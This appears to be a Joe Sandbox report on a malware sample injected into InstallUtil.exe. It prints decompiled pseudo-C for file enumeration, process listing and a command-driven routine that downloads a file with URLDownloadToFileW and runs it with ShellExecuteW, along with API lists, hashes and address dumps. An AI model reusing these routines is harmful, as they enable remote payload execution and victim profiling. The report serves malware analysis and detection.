                                                                      						_t114 = E00417C45(_t118, _t172 - 0x34, 0x4610ec, _t172);
                                                                      						_t175 = _t185 + 0x18;
                                                                      						E00401ED3(_t172 + 0x20, _t165, _t169, _t114);
                                                                      						E00401EC9();
                                                                      					}
                                                                      				}
                                                                      				_t176 = _t175 - 0x18;
                                                                      				E0040773A(_t118, _t176, _t165, _t188, _t172 + 8);
                                                                      				_t62 = E00417C80(_t118, _t172 - 0x34, _t165, _t172);
                                                                      				_t177 = _t176 + 0x18;
                                                                      				E0040321D(_t62);
                                                                      				E00401EC9();
                                                                      				L00407735(_t118, _t172 + 8, _t167, _t172, "\\");
                                                                      				 *(_t172 - 4) =  *(_t172 - 4) & 0x00000000;
                                                                      				_t166 = _t172 + 8;
                                                                      				_t170 = FindFirstFileW(E00401EC4(E004078F9(_t172 - 0x34, _t172 + 8, _t172, "*")), _t172 - 0x2b4);
                                                                      				 *(_t172 - 0x18) = _t170;
                                                                      				E00401EC9();
                                                                      				if(_t170 == 0xffffffff) {
                                                                      					 *((intOrPtr*)(_t172 - 0x1c)) = 2;
                                                                      					E00435A36(_t172 - 0x1c, 0x469620);
                                                                      				}
                                                                      				while(FindNextFileW(_t170, _t172 - 0x2b4) != 0) {
                                                                      					if( *0x46dae4 != 0) {
                                                                      						E00401F98();
                                                                      						E00401EC9();
                                                                      						E00401EC9();
                                                                      						E00401F98();
                                                                      						_t78 = 0;
                                                                      						__eflags = 0;
                                                                      						L15:
                                                                      						 *[fs:0x0] =  *((intOrPtr*)(_t172 - 0xc));
                                                                      						return _t78;
                                                                      					}
                                                                      					if(( *(_t172 - 0x2b4) & 0x00000010) == 0) {
                                                                      						_t179 = _t177 - 0x18;
                                                                      						E004020B6(_t118, _t179, _t166, __eflags, _t172 + 0x38);
                                                                      						_t180 = _t179 - 0x18;
                                                                      						E0040773A(_t118, _t180, _t166, __eflags, _t172 + 0x20);
                                                                      						_t88 = E0040413E(_t118, _t172 - 0x34, _t166, _t172, _t172 - 0x288);
                                                                      						_t166 = _t172 + 8;
                                                                      						_t89 = E004079C1(_t118, _t172 - 0x64, _t172 + 8, _t172, __eflags, _t88);
                                                                      						_t181 = _t180 - 0x14;
                                                                      						E00403222(_t118, _t181, _t172, __eflags, _t89);
                                                                      						E00407168(_t118, _t172 + 8);
                                                                      						_t177 = _t181 + 0x48;
                                                                      						E00401EC9();
                                                                      						L11:
                                                                      						E00401EC9();
                                                                      						continue;
                                                                      					}
                                                                      					if(E00438B0D(_t172 - 0x288, _t172 - 0x288, ".") == 0) {
                                                                      						continue;
                                                                      					}
                                                                      					_t97 = E00438B0D(_t172 - 0x288, _t172 - 0x288, L"..");
                                                                      					_t194 = _t97;
                                                                      					if(_t97 == 0) {
                                                                      						continue;
                                                                      					}
                                                                      					_t99 = E0040413E(_t118, _t172 - 0x64, _t166, _t172, _t172 - 0x288);
                                                                      					_t166 = _t172 + 8;
                                                                      					E004079C1(_t118, _t172 - 0x34, _t172 + 8, _t172, _t194, _t99);
                                                                      					E00401EC9();
                                                                      					_t182 = _t177 - 0x18;
                                                                      					E004020B6(_t118, _t182, _t172 + 8, _t194, _t172 + 0x38);
                                                                      					_t183 = _t182 - 0x18;
                                                                      					E0040773A(_t118, _t183, _t172 + 8, _t194, _t172 + 0x20);
                                                                      					_t184 = _t183 - 0x18;
                                                                      					E0040773A(_t118, _t184, _t166, _t194, _t172 - 0x34);
                                                                      					E00406EEF(_t118, _t166, _t194);
                                                                      					_t177 = _t184 + 0x48;
                                                                      					goto L11;
                                                                      				}
                                                                      				 *(_t172 - 4) =  *(_t172 - 4) | 0xffffffff;
                                                                      				FindClose(_t170);
                                                                      				E00401F98();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401F98();
                                                                      				_t78 = 1;
                                                                      				goto L15;
                                                                      			}

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00406EF4
                                                                      • FindFirstFileW.KERNEL32(00000000,?,00461290,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406FAD
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00406FD5
                                                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406FE2
                                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004070F8
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                      • String ID:
                                                                      • API String ID: 1771804793-0
                                                                      • Opcode ID: 27e34cea9e1d0df1f6daa4209800672c95583c587532d31e79eebf6b15aa0a5d
                                                                      • Instruction ID: 08439ae8b33b50fc5d6a13e5a6783f37bbabfab6e2bc077479c497040ee348bf
                                                                      • Opcode Fuzzy Hash: 27e34cea9e1d0df1f6daa4209800672c95583c587532d31e79eebf6b15aa0a5d
                                                                      • Instruction Fuzzy Hash: D15150729042099ACF04FB75DD569ED7768AF10348F50417EB806B71E2EF38AB49CB89
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 96%
                                                                      			E0040D3C8(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                                                                      				char _v540;
                                                                      				char _v568;
                                                                      				void* _v572;
                                                                      				void* _v584;
                                                                      				char _v604;
                                                                      				void* _v608;
                                                                      				char _v628;
                                                                      				void* _v632;
                                                                      				char _v652;
                                                                      				void* _v656;
                                                                      				char _v676;
                                                                      				void* _v680;
                                                                      				char _v700;
                                                                      				void* _v704;
                                                                      				char _v724;
                                                                      				void* _v728;
                                                                      				char _v748;
                                                                      				void* _v752;
                                                                      				char _v772;
                                                                      				void* _v776;
                                                                      				char _v796;
                                                                      				void* _v800;
                                                                      				char _v820;
                                                                      				void* _v824;
                                                                      				char _v844;
                                                                      				void* _v848;
                                                                      				char _v868;
                                                                      				void* _v872;
                                                                      				char _v892;
                                                                      				void* _v896;
                                                                      				char _v912;
                                                                      				char _v916;
                                                                      				void* _v920;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				int _t45;
                                                                      				void* _t50;
                                                                      				void* _t51;
                                                                      				void* _t53;
                                                                      				void* _t133;
                                                                      				void* _t134;
                                                                      
                                                                      				_t120 = __edx;
                                                                      				_t81 = __ecx;
                                                                      				_t80 = __ebx;
                                                                      				_t133 = __ecx;
                                                                      				E0040209F(__ebx, __ecx);
                                                                      				 *0x46dea8 = E004186B9(_t81);
                                                                      				_t134 = CreateToolhelp32Snapshot(2, 0);
                                                                      				if(_t134 != 0) {
                                                                      					_v568 = 0x22c;
                                                                      					_push( &_v568);
                                                                      					Process32FirstW(_t134);
                                                                      					_t45 = Process32NextW(_t134,  &_v572);
                                                                      					_t138 = _t45;
                                                                      					if(_t45 != 0) {
                                                                      						do {
                                                                      							E0040413E(__ebx,  &_v912, _t120, 0x462008,  &_v540);
                                                                      							_t50 = E004182D1(_t80,  &_v604, E004186E7(_v572) & 0x000000ff);
                                                                      							_t51 = E004182D1(_t80,  &_v628, _v572);
                                                                      							_t53 = E00418445(_t80,  &_v676, E0041871D( &_v652, _v572));
                                                                      							_t120 = E00402E61( &_v868, E0040793B(_t80,  &_v844, E00402E61( &_v820, E0040793B(_t80,  &_v796, E00402E61( &_v772, E0040793B(_t80,  &_v748, E004078D8(_t80,  &_v724, _t133, 0x462008, _t138, E00418445(_t80,  &_v700,  &_v916)), _t133, 0x462008, _t138, 0x462008), _t53), _t133, 0x462008, _t138, 0x462008), _t51), _t133, 0x462008, _t138, 0x462008), _t50);
                                                                      							E00401FA2(_t133, _t61, _t134, E0040793B(_t80,  &_v892, _t61, _t133, 0x462008, _t138, "|"));
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401EC9();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401EC9();
                                                                      						} while (Process32NextW(_t134,  &_v584) != 0);
                                                                      					}
                                                                      					CloseHandle(_t134);
                                                                      				}
                                                                      				return _t133;
                                                                      			}

                                                                      Address column for the decompiled function above: 0x0040d3c8 .. 0x0040d5e1

                                                                      APIs
                                                                        • Part of subcall function 004186B9: GetCurrentProcess.KERNEL32(?,?,?,004190D4,WinDir,00000000,00000000), ref: 004186CA
                                                                        • Part of subcall function 004186B9: IsWow64Process.KERNEL32(00000000,?,?,004190D4,WinDir,00000000,00000000), ref: 004186D1
                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040D3E6
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0040D40A
                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040D419
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040D5D0
                                                                        • Part of subcall function 004186E7: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040D11A,00000000,?,?,00000001), ref: 004186FC
                                                                        • Part of subcall function 004186E7: IsWow64Process.KERNEL32(00000000,?,?,?,00000001), ref: 00418707
                                                                        • Part of subcall function 0041871D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00418732
                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040D5C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Process$Process32$NextOpenWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 44284711-0
                                                                      • Opcode ID: 1e3e0d5857e4e82ba1d5393f40dcc210af5bbf592fa685b727e1ed2b8d51dd47
                                                                      • Instruction ID: 875a3bb42d5602bce30afad110d203e4b696146524c0371441d018b9139525ce
                                                                      • Opcode Fuzzy Hash: 1e3e0d5857e4e82ba1d5393f40dcc210af5bbf592fa685b727e1ed2b8d51dd47
                                                                      • Instruction Fuzzy Hash: DA4183311082455FC325FB21DC51AEFB3E9AF94308F50493EB54A961E2EF386A4AC75A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E00405CE1(short* __edx, void* __eflags, intOrPtr _a4, char _a8) {
                                                                      				char _v28;
                                                                      				char _v44;
                                                                      				char _v60;
                                                                      				char _v64;
                                                                      				char _v68;
                                                                      				char _v72;
                                                                      				char _v76;
                                                                      				char _v84;
                                                                      				void* _v104;
                                                                      				void* __ebx;
                                                                      				void* __ebp;
                                                                      				intOrPtr* _t33;
                                                                      				void* _t50;
                                                                      				signed char _t54;
                                                                      				intOrPtr* _t57;
                                                                      				void* _t59;
                                                                      				void* _t63;
                                                                      				void* _t70;
                                                                      				void* _t72;
                                                                      				void* _t77;
                                                                      				intOrPtr* _t79;
                                                                      				void* _t81;
                                                                      				void* _t83;
                                                                      				void* _t84;
                                                                      				void* _t86;
                                                                      				void* _t88;
                                                                      				void* _t106;
                                                                      				void* _t120;
                                                                      				void* _t144;
                                                                      				void* _t148;
                                                                      				void* _t155;
                                                                      				signed int _t156;
                                                                      				void* _t159;
                                                                      				void* _t160;
                                                                      				void* _t161;
                                                                      				void* _t163;
                                                                      				void* _t167;
                                                                      				void* _t168;
                                                                      
                                                                      				_t168 = __eflags;
                                                                      				_t140 = __edx;
                                                                      				_t33 = E00401F6B( &_a8);
                                                                      				_push(0xffffffff);
                                                                      				_t88 = 4;
                                                                      				_push(_t88);
                                                                      				_push( &_v28);
                                                                      				E00404162( &_a8);
                                                                      				_t159 = (_t156 & 0xfffffff8) - 0x2c;
                                                                      				E004020B6(_t88, _t159, __edx, _t168, 0x46e260);
                                                                      				_t160 = _t159 - 0x18;
                                                                      				E004020B6(_t88, _t160, __edx, _t168,  &_v44);
                                                                      				E0041851D( &_v84, _t140);
                                                                      				_t161 = _t160 + 0x30;
                                                                      				_t148 =  *_t33 - _t88;
                                                                      				if(_t148 == 0) {
                                                                      					_t144 = 0;
                                                                      					E00401E25( &_v64, _t140, _t155, __eflags, 0);
                                                                      					_t141 = "F";
                                                                      					__eflags = E00405ADC("F");
                                                                      					if(__eflags == 0) {
                                                                      						E00401E25( &_v68, "F", _t155, __eflags, 0);
                                                                      						_t140 = "M";
                                                                      						__eflags = E00405ADC("M");
                                                                      						if(__eflags == 0) {
                                                                      							L23:
                                                                      							E00401E4D( &_v64, _t140);
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							return 0;
                                                                      						}
                                                                      						_v68 = 0;
                                                                      						_t50 = E00401F6B(E00401E25( &_v64, "M", _t155, __eflags, _t88));
                                                                      						_t140 =  &_v76;
                                                                      						__eflags = E00418192(_t50,  &_v76,  &_v68);
                                                                      						if(__eflags == 0) {
                                                                      							_t106 = _t161 - 0x18;
                                                                      							_push("2");
                                                                      							L22:
                                                                      							E00402053(_t88, _t106, _t140, _t155);
                                                                      							_push(0xb3);
                                                                      							E00404A78(_a4, _t140, __eflags);
                                                                      							goto L23;
                                                                      						}
                                                                      						_t140 = _v72;
                                                                      						_t54 = E004150C2(0x46daf8);
                                                                      						L0043868C(_v72);
                                                                      						_t163 = _t161 - 0x18;
                                                                      						__eflags = (_t54 & 0x000000ff) - 1;
                                                                      						L9:
                                                                      						_t106 = _t163;
                                                                      						if(__eflags != 0) {
                                                                      							_push("3");
                                                                      						} else {
                                                                      							_push("1");
                                                                      						}
                                                                      						goto L22;
                                                                      					}
                                                                      					_t57 = E00401F6B(E00401E25( &_v68, "F", _t155, __eflags, 2));
                                                                      					_t59 = E00401F6B(E00401E25( &_v68, _t141, _t155, __eflags, 3));
                                                                      					_t140 =  *_t57;
                                                                      					E0041905E( &_v60,  *_t57, _t59);
                                                                      					_t63 = E00401F6B(E00401E25( &_v72,  *_t57, _t155, __eflags, _t88));
                                                                      					__imp__URLDownloadToFileW(0, _t63, E00401EC4( &_v60), 0, 0);
                                                                      					__eflags = _t63;
                                                                      					if(__eflags == 0) {
                                                                      						L4:
                                                                      						if( *((char*)(E00401F6B(E00401E25( &_v84, _t140, _t155, _t172, 1)))) == 0) {
                                                                      							_t120 = _t161 - 0x18;
                                                                      							_push("0");
                                                                      						} else {
                                                                      							_t70 = ShellExecuteW(_t144, L"open", E00401EC4( &_v72), _t144, _t144, 1);
                                                                      							_t120 = _t161 - 0x18;
                                                                      							_t174 = _t70 - 0x20;
                                                                      							if(_t70 > 0x20) {
                                                                      								_push("1");
                                                                      							} else {
                                                                      								_push("3");
                                                                      							}
                                                                      						}
                                                                      						L17:
                                                                      						E00402053(_t88, _t120, _t140, _t155);
                                                                      						_push(0xb3);
                                                                      						E00404A78(_a4, _t140, _t174);
                                                                      						E00401EC9();
                                                                      						goto L23;
                                                                      					}
                                                                      					L14:
                                                                      					_t120 = _t161 - 0x18;
                                                                      					_push("2");
                                                                      					goto L17;
                                                                      				}
                                                                      				_t170 = _t148 != 1;
                                                                      				if(_t148 != 1) {
                                                                      					goto L23;
                                                                      				}
                                                                      				_t144 = 0;
                                                                      				E00401E25( &_v64, _t140, _t155, _t170, 0);
                                                                      				_t142 = "F";
                                                                      				_t72 = E00405ADC("F");
                                                                      				_t171 = _t72;
                                                                      				if(_t72 == 0) {
                                                                      					E00401E25( &_v68, "F", _t155, __eflags, 0);
                                                                      					_t140 = "M";
                                                                      					__eflags = E00405ADC("M");
                                                                      					if(__eflags == 0) {
                                                                      						goto L23;
                                                                      					} else {
                                                                      						_t140 = E00401F6B(E00401E25( &_v64, "M", _t155, __eflags, _t88));
                                                                      						_t77 = E004150C2(0x46daf8);
                                                                      						_t163 = _t161 - 0x18;
                                                                      						__eflags = _t77 - 1;
                                                                      						goto L9;
                                                                      					}
                                                                      				}
                                                                      				_t79 = E00401F6B(E00401E25( &_v68, "F", _t155, _t171, 2));
                                                                      				_t81 = E00401F6B(E00401E25( &_v68, _t142, _t155, _t171, 3));
                                                                      				_t140 =  *_t79;
                                                                      				E0041905E( &_v60,  *_t79, _t81);
                                                                      				_t83 = E00401EC4( &_v60);
                                                                      				_t84 = E00401E25( &_v72,  *_t79, _t155, _t171, _t88);
                                                                      				_t167 = _t161 - 0x18;
                                                                      				E004020B6(_t88, _t167, _t140, _t171, _t84);
                                                                      				_t86 = E00418A12(_t83);
                                                                      				_t161 = _t167 + 0x18;
                                                                      				_t172 = _t86 - 1;
                                                                      				if(_t86 != 1) {
                                                                      					goto L14;
                                                                      				}
                                                                      				goto L4;
                                                                      			}

                                                                      Address column for the decompiled function above, starting at entry 0x00405ce1
                                                                      0x00405dbf
                                                                      0x00405dc2
                                                                      0x00405dc4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00405DF9
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00405EDD
Strings
Memory Dump Source
• Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
Yara matches
Similarity
• API ID: DownloadExecuteFileShell
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe$open
• API String ID: 2825088817-3283330448
• Opcode ID: 4b64103677c21db963c478d9da3482afbd7fa024788eee8ed7d6eef4609f2a41
• Instruction ID: 55cac6a69391351ff621bf79e6dbd42a0a3a38598ca708c99eb2f4446a69e34d
• Opcode Fuzzy Hash: 4b64103677c21db963c478d9da3482afbd7fa024788eee8ed7d6eef4609f2a41
• Instruction Fuzzy Hash: 5961D271B0470166CA14FB76C9669BF36A59F81308F00093FF842B71E2EE3C8949C69B
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 68%
E0044DA49(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, intOrPtr _a12) {
	intOrPtr* _v8;
	short _v12;
	signed int _v32;
	intOrPtr _v40;
	signed int _v52;
	char _v272;
	short _v292;
	void* __ebp;
	void* _t34;
	short* _t35;
	intOrPtr* _t36;
	signed int _t39;
	signed short* _t44;
	intOrPtr _t47;
	void* _t49;
	signed int _t52;
	signed int _t58;
	signed int _t60;
	signed int _t66;
	void* _t68;
	void* _t71;
	void* _t76;
	void* _t80;
	intOrPtr _t87;
	short* _t89;
	void* _t90;
	void* _t92;
	short _t94;
	void* _t95;
	intOrPtr* _t98;
	void* _t112;
	void* _t116;
	intOrPtr* _t118;
	intOrPtr _t121;
	signed int* _t122;
	intOrPtr* _t125;
	signed short _t127;
	int _t129;
	signed int _t132;
	void* _t133;
	signed int _t134;

	_t115 = __edx;
	_push(__ecx);
	_push(__ecx);
	_push(__ebx);
	_push(__esi);
	_push(__edi);
	_t34 = E00444255(__ebx, __ecx, __edx);
	_t87 = _a4;
	_t94 = 0;
	_v12 = 0;
	_t3 = _t34 + 0x50; // 0x50
	_t125 = _t3;
	_t4 = _t125 + 0x250; // 0x2a0
	_t35 = _t4;
	 *((intOrPtr*)(_t125 + 8)) = 0;
	 *_t35 = 0;
	_t6 = _t125 + 4; // 0x54
	_t118 = _t6;
	_v8 = _t35;
	_t36 = _t87 + 0x80;
	 *_t125 = _t87;
	 *_t118 = _t36;
	if( *_t36 != 0) {
		E0044D9DA(0x45b1e0, 0x16, _t118);
		_t133 = _t133 + 0xc;
		_t94 = 0;
	}
	_push(_t125);
	if( *((intOrPtr*)( *_t125)) == _t94) {
		E0044D34B(_t87, _t94, _t115, _t118, __eflags);
		goto L12;
	} else {
		if( *((intOrPtr*)( *_t118)) == _t94) {
			E0044D46E();
		} else {
			E0044D3D4(_t94);
		}
		_pop(_t95);
		if( *((intOrPtr*)(_t125 + 8)) == 0) {
			_t80 = E0044D9DA(0x45aed0, 0x40, _t125);
			_t133 = _t133 + 0xc;
			if(_t80 != 0) {
				_push(_t125);
				if( *((intOrPtr*)( *_t118)) == 0) {
					E0044D46E();
				} else {
					E0044D3D4(0);
				}
				L12:
				_pop(_t95);
			}
		}
	}
	if( *((intOrPtr*)(_t125 + 8)) == 0) {
		L31:
		_t39 = 0;
		__eflags = 0;
		goto L32;
	} else {
		_t127 = E0044D8A8(_t95, _t87 + 0x100, _t125);
		if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
			goto L31;
		} else {
			_t44 = _a8;
			if(_t44 != 0) {
				 *_t44 = _t127;
			}
			_t121 = _a12;
			if(_t121 == 0) {
				L30:
				_t39 = 1;
				goto L32;
			} else {
				_t98 = _v8;
				_t15 = _t121 + 0x120; // 0x440c53
				_t89 = _t15;
				 *_t89 = 0;
				_t116 = _t98 + 2;
				do {
					_t47 =  *_t98;
					_t98 = _t98 + 2;
				} while (_t47 != _v12);
				_t100 = _t98 - _t116 >> 1;
				_push((_t98 - _t116 >> 1) + 1);
				_t49 = E0044BE3A(_t98 - _t116 >> 1, _t89, 0x55, _v8);
				_t134 = _t133 + 0x10;
				_t153 = _t49;
				if(_t49 != 0) {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00438659();
					asm("int3");
					_t132 = _t134;
					_t52 =  *0x46c00c; // 0xe1ce05e9
					_v52 = _t52 ^ _t132;
					_push(_t89);
					_push(_t127);
					_push(_t121);
					_t90 = E00444255(_t89, _t100, _t116);
					_t122 =  *(E00444255(_t90, _t100, _t116) + 0x34c);
					_t129 = E0044E15C(_v40);
					asm("sbb ecx, ecx");
					_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
					__eflags = _t58;
					if(_t58 != 0) {
						_t60 = E0044F785(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v272);
						__eflags = _t60;
						if(_t60 == 0) {
							_t66 = E0044E290(_t129);
							__eflags = _t66;
							if(_t66 != 0) {
								 *_t122 =  *_t122 | 0x00000004;
								__eflags =  *_t122;
								_t122[2] = _t129;
								_t122[1] = _t129;
							}
						}
						__eflags =  !( *_t122 >> 2) & 0x00000001;
					} else {
						 *_t122 =  *_t122 & _t58;
					}
					__eflags = _v32 ^ _t132;
					return E004318FB(_v32 ^ _t132);
				} else {
					_t68 = E0044492D(_t100, _t127, _t153, _t89, 0x1001, _t121, 0x40);
					_t154 = _t68;
					if(_t68 == 0) {
						goto L31;
					} else {
						_t20 = _t121 + 0x80; // 0x440bb3
						_t92 = _t20;
						_t21 = _t121 + 0x120; // 0x440c53
						if(E0044492D(_t100, _t127, _t154, _t21, 0x1002, _t92, 0x40) == 0) {
							goto L31;
						} else {
							_push(0x5f);
							_t71 = E004536E7(_t100);
							_t112 = _t92;
							if(_t71 != 0) {
								L28:
								_t22 = _t121 + 0x120; // 0x440c53
								if(E0044492D(_t112, _t127, _t157, _t22, 7, _t92, 0x40) == 0) {
									goto L31;
								} else {
									goto L29;
								}
							} else {
								_push(0x2e);
								_t76 = E004536E7(_t112);
								_t112 = _t92;
								_t157 = _t76;
								if(_t76 == 0) {
									L29:
									_t23 = _t121 + 0x100; // 0x440c33
									E0043DE3F(_t112, _t127, _t23, 0x10, 0xa);
									goto L30;
								} else {
									goto L28;
								}
							}
						}
					}
					L32:
					return _t39;
				}
			}
		}
	}
}

Instruction addresses from the address column of the C-Code listing above (E0044DA49):
0x0044da49, 0x0044da4e, 0x0044da4f, 0x0044da50, 0x0044da51, 0x0044da52, 0x0044da53, 0x0044da58,
0x0044da5b, 0x0044da5d, 0x0044da60, 0x0044da60, 0x0044da63, 0x0044da63, 0x0044da69, 0x0044da6c,
0x0044da6f, 0x0044da6f, 0x0044da72, 0x0044da75, 0x0044da7b, 0x0044da7d, 0x0044da82, 0x0044da8c,
0x0044da91, 0x0044da94, 0x0044da94, 0x0044da98, 0x0044da9c, 0x0044dae5, 0x00000000, 0x0044da9e,
0x0044daa3, 0x0044daac, 0x0044daa5, 0x0044daa5, 0x0044daa5, 0x0044dab3, 0x0044dab7, 0x0044dac1,
0x0044dac6, 0x0044dacb, 0x0044dad1, 0x0044dad5, 0x0044dade, 0x0044dad7, 0x0044dad7, 0x0044dad7,
0x0044daea, 0x0044daea, 0x0044daea, 0x0044dacb, 0x0044dab7, 0x0044daf0, 0x0044dc02, 0x0044dc02,
0x0044dc02, 0x00000000, 0x0044daf6, 0x0044db03, 0x0044db09, 0x00000000, 0x0044db39, 0x0044db39,
0x0044db3e, 0x0044db40, 0x0044db40, 0x0044db42, 0x0044db47, 0x0044dbfd, 0x0044dbff, 0x00000000,
0x0044db4d, 0x0044db4d, 0x0044db50, 0x0044db50, 0x0044db58, 0x0044db5b, 0x0044db5e, 0x0044db5e,
0x0044db61, 0x0044db64, 0x0044db6c, 0x0044db71, 0x0044db78, 0x0044db7d, 0x0044db80, 0x0044db82,
0x0044dc0d, 0x0044dc0e, 0x0044dc0f, 0x0044dc10, 0x0044dc11, 0x0044dc12, 0x0044dc17, 0x0044dc1b,
0x0044dc23, 0x0044dc2a, 0x0044dc2d, 0x0044dc2e, 0x0044dc32, 0x0044dc38, 0x0044dc40, 0x0044dc4f,
0x0044dc5b, 0x0044dc6c, 0x0044dc72, 0x0044dc74
                                                                      0x0044dc85
                                                                      0x0044dc8c
                                                                      0x0044dc8e
                                                                      0x0044dc91
                                                                      0x0044dc97
                                                                      0x0044dc99
                                                                      0x0044dc9b
                                                                      0x0044dc9b
                                                                      0x0044dc9e
                                                                      0x0044dca1
                                                                      0x0044dca1
                                                                      0x0044dc99
                                                                      0x0044dcab
                                                                      0x0044dc76
                                                                      0x0044dc76
                                                                      0x0044dc78
                                                                      0x0044dcb3
                                                                      0x0044dcbe
                                                                      0x0044db88
                                                                      0x0044db91
                                                                      0x0044db96
                                                                      0x0044db98
                                                                      0x00000000
                                                                      0x0044db9a
                                                                      0x0044db9c
                                                                      0x0044db9c
                                                                      0x0044dba8
                                                                      0x0044dbb6
                                                                      0x00000000
                                                                      0x0044dbb8
                                                                      0x0044dbb8
                                                                      0x0044dbbb
                                                                      0x0044dbc1
                                                                      0x0044dbc4
                                                                      0x0044dbd4
                                                                      0x0044dbd9
                                                                      0x0044dbe7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044dbc6
                                                                      0x0044dbc6
                                                                      0x0044dbc9
                                                                      0x0044dbcf
                                                                      0x0044dbd0
                                                                      0x0044dbd2
                                                                      0x0044dbe9
                                                                      0x0044dbed
                                                                      0x0044dbf5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044dbd2
                                                                      0x0044dbc4
                                                                      0x0044dbb6
                                                                      0x0044dc04
                                                                      0x0044dc0a
                                                                      0x0044dc0a
                                                                      0x0044db82
                                                                      0x0044db47
                                                                      0x0044db09

                                                                      APIs
                                                                        • Part of subcall function 00444255: GetLastError.KERNEL32(?,0043DA65,00437135,0043DA65,0046E278,?,0043B7CA,FF8BC35D,0046E278,0046E278), ref: 00444259
                                                                        • Part of subcall function 00444255: _free.LIBCMT ref: 0044428C
                                                                        • Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442CD
                                                                        • Part of subcall function 00444255: _abort.LIBCMT ref: 004442D3
                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00440B33,?,?,?,?,0044058A,?,00000004), ref: 0044DB2B
                                                                      • _wcschr.LIBVCRUNTIME ref: 0044DBBB
                                                                      • _wcschr.LIBVCRUNTIME ref: 0044DBC9
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00440B33,00000000,00440C53), ref: 0044DC6C
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                      • String ID:
                                                                      • API String ID: 4212172061-0
                                                                      • Opcode ID: f18fc354256aacc0aa0c3c00cb84dedb87302ef82b525088d055e9cd767a0e65
                                                                      • Instruction ID: a54651c51f7673d7e4d8e5c92585977fdf8441358307bd5fe5e04e11595a8cab
                                                                      • Opcode Fuzzy Hash: f18fc354256aacc0aa0c3c00cb84dedb87302ef82b525088d055e9cd767a0e65
                                                                      • Instruction Fuzzy Hash: 4361E871A00206AAF725AF75CC86BAB73A8EF44314F14446FF905D7281EB78E941C769
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0044058A,?,00000004), ref: 00444980
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
